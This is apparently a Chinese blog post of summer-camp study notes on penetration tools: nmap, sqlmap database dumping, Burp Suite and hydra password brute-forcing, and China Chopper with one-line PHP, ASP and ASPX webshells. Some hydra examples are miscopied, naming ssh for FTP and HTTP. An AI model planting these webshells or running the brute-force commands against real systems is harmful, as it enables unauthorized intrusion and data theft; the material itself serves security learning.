夏令营集训1---渗透工具

在这里插入图片描述
1 nmap
在这里插入图片描述

主要功能:

(1)
主机发现
(2)
端口扫描
(3)
版本侦测
(4)
操作系统侦测

nmap的常用参数:

-A :选项用于使用进攻性方式扫描
-T4: 指定扫描过程使用的时序,总有6个级别(0-5),级别越高,扫描速度越 快,但也容易被防火墙或IDS检测并屏蔽掉,在网络通讯状况较好的情况下推荐使用T4
-oX test.xml: 将扫描结果生成 test.xml 文件
-oG test.txt: 将扫描结果生成 test.txt 文件
-sn : 只进行主机发现,不进行端口扫描
-O : 指定Nmap进行系统版本扫描
-sV: 指定让Nmap进行服务版本扫描
-p : 扫描指定的端口
-sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的 方式来对目标主机进行扫描
-sU: 指定使用UDP扫描方式确定目标主机的UDP端口状况
-script

扫描单个主机大域名或IP地址:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

2 sqlmap

在这里插入图片描述 sqlmap参数:

-p 指定测试参数
-b 获取banner
–dbs 列举数据库
–is-dba 是否是管理员权限
–current-db 当前数据库
–current-user 当前用户
–tables 列举数据库的表名

–count 检索所有条目数
–columns 获取表的列名
–dump 获取表中的数据,包含列
–dump-all 转存DBMS数据库所有表项目
–level 测试等级(1-5),默认为1
-v 显示详细信息

在这里插入图片描述

实例:查看指定数据库,表,列,内容等:

–dbs 列举数据库
在这里插入图片描述

–current-db 当前数据库

在这里插入图片描述在这里插入图片描述

–tables 列举数据库的表名
在这里插入图片描述

在这里插入图片描述

–columns 获取表的列名
在这里插入图片描述
在这里插入图片描述

–dump 获取表中的数据,包含列
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

3 burpsuite

在这里插入图片描述
proxy代理模块
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

今天我们当场爆破了一个四位数密码:

在这里插入图片描述

配置好代理,然后抓包具体看前面,抓到包就发送到intrude然后依次步骤:

Attack-type攻击类型为一处爆破点,因此payload set有效载荷为1,有效载荷类型为数字。然后从0000开始因为不知道密码是几位数,每次位一个步骤:

在这里插入图片描述

在这里插入图片描述

当扫完的时候你会发现密码的长度或是一些内容会和其他的又很明显的区别,所以一般情况就是那个:
在这里插入图片描述
4 hydra
在这里插入图片描述
hydra参数:
-R:继续从上一次进度接着破解
-S:大写,采用SSL链接
-s :小写,可通过这个参数指定非默认端口
-l :指定破解的用户,对特定用户破解
-L :指定用户名字典
-p :小写,指定密码破解,少用,一般是采用密码字典
-P :大写,指定密码字典
-e :可选,n:空密码试探,s:使用指定用户和密码试探
-C :使用冒号分割格式,例如“登录名:密码”来
代替 -L/-P 参数
-M :指定目标列表文件一行一条
-o :指定结果输出文件
-f :在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
-t :同时运行的线程数,默认为16
-w

破解ssh

hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 5 target_IP ssh

-L指定用户字典 -P 指定密码字典 -o把成功的输出到ssh.txt文件 -vV显示详细信息

破解FTP:

hydra -L user.txt -P passwd.txt -o ftp.txt -vV -t 5 target_IP ssh
-L指定用户名列表
-P指定密码字典
-o把爆破的输出到文件
-t指定线程
-vV 显示详细信息

破解HTTP:

hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 5 target_IP ssh

-L指定用户字典

-P 指定密码字典    
    -o把成功的输出到ssh.txt文件   
          -vV显示详细信息

6 中国菜刀:
在这里插入图片描述

基本操作:

往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取

在这里插入图片描述
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。
简单的一句话木马:
PHP:
<?php @eval($_POST['pass']);?>
Asp:
<%eval request (“pass”)%>
Aspx:
<%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>

还不理解!

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
计算机夏令营面试中,常问的专业问题涵盖了计算机科学与技术的基础知识、实际应用能力以及专业发展方向等多个方面。以下是几个常见的问题及回答: 1. "请介绍一下你的专业背景和学习经历。" 回答时可以简要概括自己的专业背景,包括计算机科学相关的课程和项目经验。同时,突出个人学习方法和对计算机科学的热情,以及如何与团队合作等。 2. "你在哪个领域的计算机技术有专长?" 可以根据个人兴趣和学习经历选择一个具体领域,如人工智能、网络安全、数据分析等。接着可以分享相关项目经验,参与的竞赛或开源项目等,突出自己在该领域的学习和实践能力。 3. "你对编程语言的了解和应用如何?" 回答时可以先介绍熟悉的编程语言,如C++、Java等,并简单说明掌握的能力和项目开发经验。可以结合实例,讲述自己解决问题或优化程序的经验,以及对新兴编程语言或开发框架的学习能力。 4. "你在实际项目中遇到过哪些挑战,如何解决的?" 可以选择一个具体的项目案例,介绍自己在项目中所面临的难题,如性能优化、需求变等,并展示自己的解决方案。可以突出自己的分析思路、团队合作能力和解决问题的效果。 5. "你未来的发展方向是什么?" 可以通过介绍自己对计算机科学与技术的热情和兴趣,以及在学校或实习中获得的经验来回答这个问题。可以提及个人的职业规划,如继续深耕某个领域、不断学习新技术或追求研究方向等。 6. "你在课外有参与过哪些计算机相关的活动或项目?" 可以分享一些有趣的课外活动或计算机相关的项目,如参加编程比赛、担任学生科技协会的职位、参与开源项目等。突出自己的团队合作能力、创新思维和对计算机技术的探索精神。 在面试中,回答问题时需简洁明了,突出自己的优势和个人特点,同时展示学习能力和团队合作能力。此外,可以提前了解常见的计算机领域知识和技术趋势,以便好地回答相关问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值